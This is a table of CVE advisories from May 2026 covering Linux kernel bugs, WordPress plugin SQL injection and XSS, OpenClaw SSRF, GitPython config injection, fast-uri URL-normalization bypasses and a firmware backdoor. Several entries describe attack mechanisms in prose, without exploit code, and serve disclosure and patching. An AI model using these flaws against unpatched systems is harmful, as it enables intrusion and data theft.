https://git.kernel.org/stable/c/95597d11dc8bddb2b9a051c9232000bfbb5e43ba https://git.kernel.org/stable/c/950803f7254721c1c15858fbbfae3deaaeeecb11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: soc-core: flush delayed work before removing DAIs and widgets When a sound card is unbound while a PCM stream is open, a use-after-free can occur in snd_soc_dapm_stream_event(), called from the close_delayed_work workqueue handler. During unbind, snd_soc_unbind_card() flushes delayed work and then calls soc_cleanup_card_resources(). Inside cleanup, snd_card_disconnect_sync() releases all PCM file descriptors, and the resulting PCM close path can call snd_soc_dapm_stream_stop() which schedules new delayed work with a pmdown_time timer delay. Since this happens after the flush in snd_soc_unbind_card(), the new work is not caught. soc_remove_link_components() then frees DAPM widgets before this work fires, leading to the use-after-free. The existing flush in soc_free_pcm_runtime() also cannot help as it runs after soc_remove_link_components() has already freed the widgets. Add a flush in soc_cleanup_card_resources() after snd_card_disconnect_sync() (after which no new PCM closes can schedule further delayed work) and before soc_remove_link_dais() and soc_remove_link_components() (which tear down the structures the delayed work accesses). | 2026-05-08 | 7.3 | CVE-2026-43459 | https://git.kernel.org/stable/c/bf80a89da97285d9b877e0c6995e870d46b8025c https://git.kernel.org/stable/c/3887e514978d28216246360b46a9cb534969eb5a https://git.kernel.org/stable/c/231568afbc0cd25b8fb2a94ebf9738eabe1cf007 https://git.kernel.org/stable/c/317a9298c54bb00319da73e5a7179f00e67fcbdf https://git.kernel.org/stable/c/eab71e11ce2447c1e01809cbc11eab4234cf8dc8 https://git.kernel.org/stable/c/7d33e6140945482a07f8089ee86e13e02553ffdb https://git.kernel.org/stable/c/c054f0607c8bb1b1aa529bc109e4149298a1cccd https://git.kernel.org/stable/c/95bc5c225513fc3c4ce169563fb5e3929fbb938b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: amlogic: spifc-a4: Fix DMA mapping error handling Fix three bugs in aml_sfc_dma_buffer_setup() error paths: 1. Unnecessary goto: When the first DMA mapping (sfc->daddr) fails, nothing needs cleanup. Use direct return instead of goto. 2. Double-unmap bug: When info DMA mapping failed, the code would unmap sfc->daddr inline, then fall through to out_map_data which would unmap it again, causing a double-unmap. 3. Wrong unmap size: The out_map_info label used datalen instead of infolen when unmapping sfc->iaddr, which could lead to incorrect DMA sync behavior. | 2026-05-08 | 7.8 | CVE-2026-43461 | https://git.kernel.org/stable/c/0a83d6c9e149a176340190fa9cbadf2266db4c9a https://git.kernel.org/stable/c/c0b88f1176074f80140ed77fce909f254b7180ab https://git.kernel.org/stable/c/b20b437666e1cb26a7c499d1664e8f2a0ac67000 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: spacemit: Fix error handling in emac_tx_mem_map() The DMA mappings were leaked on mapping error. Free them with the existing emac_free_tx_buf() function. | 2026-05-08 | 7.5 | CVE-2026-43462 | https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60 https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16 https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix XDP multi-buf frag counting for legacy RQ XDP multi-buf programs can modify the layout of the XDP buffer when the program calls bpf_xdp_pull_data() or bpf_xdp_adjust_tail(). The referenced commit in the fixes tag corrected the assumption in the mlx5 driver that the XDP buffer layout doesn't change during a program execution. However, this fix introduced another issue: the dropped fragments still need to be counted on the driver side to avoid page fragment reference counting issues. Such issue can be observed with the test_xdp_native_adjst_tail_shrnk_data selftest when using a payload of 3600 and shrinking by 256 bytes (an upcoming selftest patch): the last fragment gets released by the XDP code but doesn't get tracked by the driver. This results in a negative pp_ref_count during page release and the following splat: WARNING: include/net/page_pool/helpers.h:297 at mlx5e_page_release_fragmented.isra.0+0x4a/0x50 [mlx5_core], CPU#12: ip/3137 Modules linked in: [...] CPU: 12 UID: 0 PID: 3137 Comm: ip Not tainted 6.19.0-rc3+ #12 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5e_page_release_fragmented.isra.0+0x4a/0x50 [mlx5_core] [...] Call Trace: <TASK> mlx5e_dealloc_rx_wqe+0xcb/0x1a0 [mlx5_core] mlx5e_free_rx_descs+0x7f/0x110 [mlx5_core] mlx5e_close_rq+0x50/0x60 [mlx5_core] mlx5e_close_queues+0x36/0x2c0 [mlx5_core] mlx5e_close_channel+0x1c/0x50 [mlx5_core] mlx5e_close_channels+0x45/0x80 [mlx5_core] mlx5e_safe_switch_params+0x1a5/0x230 [mlx5_core] mlx5e_change_mtu+0xf3/0x2f0 [mlx5_core] netif_set_mtu_ext+0xf1/0x230 do_setlink.isra.0+0x219/0x1180 rtnl_newlink+0x79f/0xb60 rtnetlink_rcv_msg+0x213/0x3a0 netlink_rcv_skb+0x48/0xf0 netlink_unicast+0x24a/0x350 netlink_sendmsg+0x1ee/0x410 __sock_sendmsg+0x38/0x60 ____sys_sendmsg+0x232/0x280 ___sys_sendmsg+0x78/0xb0 __sys_sendmsg+0x5f/0xb0 [...] do_syscall_64+0x57/0xc50 This patch fixes the issue by doing page frag counting on all the original XDP buffer fragments for all relevant XDP actions (XDP_TX , XDP_REDIRECT and XDP_PASS). This is basically reverting to the original counting before the commit in the fixes tag. As frag_page is still pointing to the original tail, the nr_frags parameter to xdp_update_skb_frags_info() needs to be calculated in a different way to reflect the new nr_frags. | 2026-05-08 | 7.5 | CVE-2026-43464 | https://git.kernel.org/stable/c/c74557495efb4bd0adefdfc8678ecdbc82a06da3 https://git.kernel.org/stable/c/03cb50e5b74fce8bf6d92b860371b66253cf0f8d https://git.kernel.org/stable/c/a6413e6f6c9d9bb9833324cb3753582f7bc0f2fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xprtrdma: Decrement re_receiving on the early exit paths In the event that rpcrdma_post_recvs() fails to create a work request (due to memory allocation failure, say) or otherwise exits early, we should decrement ep->re_receiving before returning. Otherwise we will hang in rpcrdma_xprt_drain() as re_receiving will never reach zero and the completion will never be triggered. On a system with high memory pressure, this can appear as the following hung task: INFO: task kworker/u385:17:8393 blocked for more than 122 seconds. Tainted: G S E 6.19.0 #3 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u385:17 state:D stack:0 pid:8393 tgid:8393 ppid:2 task_flags:0x4248060 flags:0x00080000 Workqueue: xprtiod xprt_autoclose [sunrpc] Call Trace: <TASK> __schedule+0x48b/0x18b0 ? ib_post_send_mad+0x247/0xae0 [ib_core] schedule+0x27/0xf0 schedule_timeout+0x104/0x110 __wait_for_common+0x98/0x180 ? __pfx_schedule_timeout+0x10/0x10 wait_for_completion+0x24/0x40 rpcrdma_xprt_disconnect+0x444/0x460 [rpcrdma] xprt_rdma_close+0x12/0x40 [rpcrdma] xprt_autoclose+0x5f/0x120 [sunrpc] process_one_work+0x191/0x3e0 worker_thread+0x2e3/0x420 ? __pfx_worker_thread+0x10/0x10 kthread+0x10d/0x230 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x273/0x2b0 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 | 2026-05-08 | 7.5 | CVE-2026-43469 | https://git.kernel.org/stable/c/7ea69259a60a364f56cf4aa9e2eafb588d1c762b https://git.kernel.org/stable/c/8cb6b5d8296b1f99a8d36849901ebabfe3f749db https://git.kernel.org/stable/c/74c39a47856bddcde7874f2196a00143b5cd0af9 https://git.kernel.org/stable/c/49f53ee4e25297d886f14e31f355ad1c2735ddfb https://git.kernel.org/stable/c/8127b5fec04757c2a41ed65bca0b3266968efd3b https://git.kernel.org/stable/c/dc3ebd7e2d73dbd4d317785735ffa6c4a6384ddf https://git.kernel.org/stable/c/7b6275c80a0c81c5f8943272292dfe67730ce849 |
| betterdocs--BetterDocs Pro | The BetterDocs Pro plugin for WordPress is vulnerable to SQL Injection via the `get_current_letter_docs` and `docs_sort_by_letter` AJAX actions in all versions up to, and including, 3.7.0. This is due to the `limit` POST parameter being interpolated directly into a SQL query string before being passed to `$wpdb->prepare()`, which only parameterizes other variables. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The Encyclopedia feature must be enabled in BetterDocs Pro settings for the vulnerability to be exploitable. | 2026-05-07 | 7.5 | CVE-2026-4348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c0f02ad-f5f1-42b1-8116-e391aaa85430?source=cve https://betterdocs.co/changelog/ |
| CISA--manage.get.gov | manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30. | 2026-05-07 | 7.6 | CVE-2026-43510 | |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains a server-side request forgery vulnerability in browser SSRF policy that allows private-network navigation by default. Attackers can exploit this misconfiguration to access internal services or metadata endpoints through browser-driven requests. | 2026-05-05 | 7.7 | CVE-2026-43527 | GitHub Security Advisory (GHSA-53vx-pmqw-863c) Patch Commit (1) Patch Commit (2) Patch Commit (3) Patch Commit (4) VulnCheck Advisory: OpenClaw < 2026.4.14 - Server-Side Request Forgery via Private Network Navigation |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains an environment variable injection vulnerability allowing malicious workspace .env files to set runtime-control variables. Attackers can inject variables affecting update sources, gateway URLs, ClawHub resolution, and browser executable paths to compromise application behavior. | 2026-05-05 | 7.3 | CVE-2026-43531 | GitHub Security Advisory (GHSA-7wv4-cc7p-jhxc) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Environment Variable Injection via Workspace .env File |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.7 before 2026.4.10 fail to normalize Discord event cover image parameters in sandbox media processing. Attackers can bypass media normalization to inject host-local media references into channel action paths expecting normalized media. | 2026-05-05 | 7.7 | CVE-2026-43532 | GitHub Security Advisory (GHSA-c9h3-5p7r-mrjh) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.7 < 2026.4.10 - Sandbox Media Normalization Bypass via Discord Event Cover Image |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery policy bypass vulnerability in existing-session browser interaction routes. Attackers can bypass SSRF navigation guards to interact with or navigate to unauthorized targets without policy enforcement. | 2026-05-05 | 7.7 | CVE-2026-43573 | GitHub Security Advisory (GHSA-527m-976r-jf79) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - SSRF Policy Bypass in Existing-Session Browser Interaction Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.5 contains a server-side request forgery vulnerability in the CDP /json/version WebSocket endpoint that allows attackers to pivot to untrusted second-hop targets. The webSocketDebuggerUrl response field is not properly validated, enabling attackers to redirect connections to arbitrary hosts and perform SSRF-style attacks. | 2026-05-06 | 7.7 | CVE-2026-43576 | GitHub Security Advisory (GHSA-f7fh-qg34-x2xh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.5 - Second-hop SSRF via CDP /json/version WebSocket URL |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an incomplete navigation guard vulnerability that allows attackers to trigger navigation without complete SSRF policy enforcement. Browser press/type style interactions, including pressKey and type submit flows, can bypass post-action security checks to execute unauthorized navigation. | 2026-05-06 | 7.7 | CVE-2026-43580 | GitHub Security Advisory (GHSA-536q-mj95-h29h) Patch Commit (1) Patch Commit (2) Patch Commit (3) VulnCheck Advisory: OpenClaw < 2026.4.10 - Incomplete Navigation Guard Coverage in Browser Interactions |
| horsicq--DIE-engine | Detect-It-Easy prior to 3.21 contains a path traversal vulnerability that allows attackers to write arbitrary files to the filesystem by crafting malicious archive entries with relative traversal sequences or absolute paths. Attackers can exploit insufficient path normalization during archive extraction to write files outside the intended extraction directory and achieve persistent code execution by overwriting user startup scripts. | 2026-05-04 | 7.1 | CVE-2026-43616 | https://github.com/horsicq/DIE-engine/releases/tag/3.21 https://github.com/horsicq/Detect-It-Easy https://github.com/horsicq/Formats/commit/56cdf50ee3c72c56284e2819b23e98332842d259 https://github.com/horsicq/XArchive/commit/6a2aa84c2fd120b704f76bb5c5ee3e9b5a7a0fcc https://github.com/horsicq/DIE-engine/commit/cbbe1688e58ffd430d284bf65f336973f083db69 https://github.com/horsicq/DIE-engine/commit/7fd300b926daf19707b2a36f0abe8b60a51308ee https://www.vulncheck.com/advisories/detect-it-easy-path-traversal-arbitrary-file-write |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.7.9, a code execution (RCE) vulnerability exists in electerm's SFTP open with system editor or "Edit with custom editor" feature. When a user opts to edit a file using open with system editor or open with a custom editor, the filename is passed directly into a command line without sanitization. A malicious actor controlling the SSH server or user OS can exploit this by crafting a filename containing shell metacharacters. If a victim subsequently attempts to edit this file, the injected commands are executed on their machine with the user's privileges. This could allow the attacker to run arbitrary code, install malware, or move laterally within the network. This issue has been patched in version 3.7.9. | 2026-05-08 | 7.8 | CVE-2026-43943 | https://github.com/electerm/electerm/security/advisories/GHSA-q4p8-8j9m-8hxj https://github.com/electerm/electerm/commit/24ce7103e264cffe6eb5476c0506a2379e6f8333 https://github.com/electerm/electerm/releases/tag/v3.7.9 |
| NixOS--Nix | An issue was discovered in Nix before 2.34.7 and Lix before 2.95.2. Unbounded recursion in the NAR (Nix Archive) parser could lead to a stack-to-heap overflow when the parser is run on a coroutine stack. The stack is allocated without a guard page, which means that a stack overflow could overwrite memory on the heap and could allow arbitrary code execution as the Nix daemon (run as root in multi-user installations) if ASLR hardening is bypassed. This can be exploited by all users able to connect to the daemon (e.g., in Nix, this is configurable via the allowed-users setting, defaulting to all users). The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 for Nix (introduced in 2.24.4); and 2.95.2, 2.94.2, and 2.93.4 for Lix (introduced in 2.93.0). | 2026-05-05 | 7.5 | CVE-2026-44028 | https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407 https://github.com/NixOS/nix/security/advisories/GHSA-vh5x-56v6-4368 https://www.openwall.com/lists/oss-security/2026/05/04/33 https://www.openwall.com/lists/oss-security/2026/05/04/32 https://lix.systems/blog/2026-05-05-lix-unsigned-integer-overflow/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.20 fails to properly reserve the OPENCLAW_ runtime-control environment namespace in workspace dotenv files, allowing attackers to override critical runtime variables. Malicious workspaces can set variables like OPENCLAW_GIT_DIR to manipulate trusted OpenClaw runtime behavior during source-update or installer flows. | 2026-05-06 | 7.8 | CVE-2026-44114 | GitHub Security Advisory (GHSA-hxvm-xjvf-93f3) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.20 - Environment Variable Namespace Collision via Workspace dotenv |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 derives loopback MCP owner context from spoofable server-issued bearer tokens in request headers. Non-owner loopback clients can present themselves as owner to bypass owner-gated operations by manipulating the sender-owner header metadata. | 2026-05-06 | 7.8 | CVE-2026-44118 | GitHub Security Advisory (GHSA-r6xh-pqhr-v4xh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Owner Context Spoofing via Bearer Token Header |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header - so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49. | 2026-05-07 | 7.8 | CVE-2026-44244 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34. | 2026-05-08 | 7.3 | CVE-2026-44338 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj |
| Postorius project--Postorius | Postorius through 1.3.13 does not escape HTML in the message subject when rendering it in the Held messages pop-up, as exploited in the wild in May 2026. | 2026-05-07 | 7.2 | CVE-2026-44742 | https://gitlab.com/mailman/postorius/-/commit/c4706abd05ba6bcf472fc674b160d3a9d6a4868b https://gitlab.com/mailman/postorius/-/merge_requests/972 https://gitlab.com/mailman/postorius/-/issues/620 https://www.openwall.com/lists/oss-security/2026/05/07/3 |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'status' parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 7.2 | CVE-2026-4803 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a14d3-bc41-4490-888c-486ad2994095?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L613 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-submissions-cpt.php#L23 https://plugins.trac.wordpress.org/changeset/3503219/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php |
| strategy11team--AWP Classifieds | The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-5100 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903 |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms - Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 1.52.1 via the 'upload-1[file][file_path]' parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Successful exploitation requires a publicly accessible form with a File Upload field where Save and Continue is enabled in that form's Behavior settings and the Save and Continue email notification is configured to attach uploaded files in Email Notifications. | 2026-05-05 | 7.5 | CVE-2026-5192 | https://www.wordfence.com/threat-intel/vulnerabilities/id/788422c4-e070-48aa-a85d-a5d5a25a6a1d?source=cve https://plugins.trac.wordpress.org/changeset/3500671/forminator |
| Ivanti--Endpoint Manager Mobile | An Improper Access Control in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to invoke arbitrary methods. | 2026-05-07 | 7 | CVE-2026-5788 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| fast-uri--fast-uri | fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions <= 3.1.0 are affected. Update to 3.1.1 or later. | 2026-05-04 | 7.5 | CVE-2026-6321 | https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6 https://cna.openjsf.org/security-advisories.html |
| fast-uri--fast-uri | fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions <= 3.1.1 are affected. Update to 3.1.2 or later. | 2026-05-05 | 7.5 | CVE-2026-6322 | https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc https://cna.openjsf.org/security-advisories.html |
| MAXHUB--MAXHUB Pivot client application | This vulnerability, in the MAXHUB Pivot client application versions prior to v1.36.2, may allow an attacker to obtain encrypted tenant email addresses and related metadata from any tenant. Due to the presence of a hardcoded AES key within the application, the encrypted data can be decrypted, enabling access to tenant email addresses and associated information in cleartext. Furthermore, an attacker may be able to cause a denial-of-service condition by enrolling multiple unauthorized devices into a tenant via MQTT, potentially disrupting tenant operations. | 2026-05-07 | 7.3 | CVE-2026-6411 | https://www.maxhub.com/en/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-127-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-127-01.json |
| www[.]pgbouncer[.]org--PgBouncer | An integer overflow in network packet parsing code in PgBouncer before 1.25.2 bypasses a boundary check and can lead to a crash. An unauthenticated remote attacker can crash PgBouncer with a malformed SCRAM authentication packet. | 2026-05-09 | 7.5 | CVE-2026-6664 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| MongoDB Inc.--MongoDB C Driver | The MongoDB C Driver's Cyrus SASL integration performs unsafe string copying during username canonicalization, enabling a heap buffer overflow before any authentication or network traffic. This may be triggered by passing untrusted input in the username of a MongoDB URI with authMechanism=GSSAPI. | 2026-05-06 | 7.8 | CVE-2026-6691 | https://jira.mongodb.org/browse/CDRIVER-6134 |
| Ivanti--Endpoint Manager Mobile | An Improper Input Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access to achieve remote code execution. | 2026-05-07 | 7.2 | CVE-2026-6973 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US |
| thedark--Auto Affiliate Links | The Auto Affiliate Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.8.8. This is due to insufficient input sanitization on the 'url' POST parameter in the aal_url_stats_save_action() function and a complete absence of output escaping in aal_display_clicks(), where the stored value is echoed directly into an anchor element's href attribute and inner text without esc_url(), esc_attr(), or esc_html(). This makes it possible for unauthenticated attackers to inject arbitrary web scripts into the admin statistics page that execute in an administrator's browser when the page is visited, leveraging a publicly exposed nonce and an unauthenticated AJAX endpoint registered via the wp_ajax_nopriv_ hook. | 2026-05-08 | 7.2 | CVE-2026-7330 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8ed84e-3504-42e3-821d-794198d7adda?source=cve https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L278 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L278 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L278 https://plugins.trac.wordpress.org/changeset/3519003/wp-auto-affiliate-links/trunk/aal_stats.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-auto-affiliate-links/tags/6.8.8&new_path=%2Fwp-auto-affiliate-links/tags/6.8.8.1 |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'booking_form_page_url' parameter in all versions up to, and including, 5.5.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious activity log entry is written to the database even when Stripe is not configured, because the latepoint_order_intent_created action hook fires before the Stripe Connect account ID is validated, meaning a fully functional Stripe integration is not required for exploitation. | 2026-05-06 | 7.2 | CVE-2026-7332 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c03ddcf0-6955-4645-b311-c3833ca61455?source=cve https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail= |
| GeoVision Inc.--GV-LPC2011/LPC2211 | Multiple reflected cross-site scripting (XSS) vulnerabilities exist in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability. Reflected XSS via the error message for requesting a non-existing page. | 2026-05-04 | 7.4 | CVE-2026-7371 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| Yarbo--Firmware | A hidden, persistent backdoor was found in Yarbo firmware v2.3.9 that provides remote, unauthenticated (or weakly authenticated) access to privileged functionality. The backdoor is undocumented, cannot be disabled via user-facing settings, and survives factory reset and ordinary firmware updates. | 2026-05-07 | 7.2 | CVE-2026-7413 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000000111 |
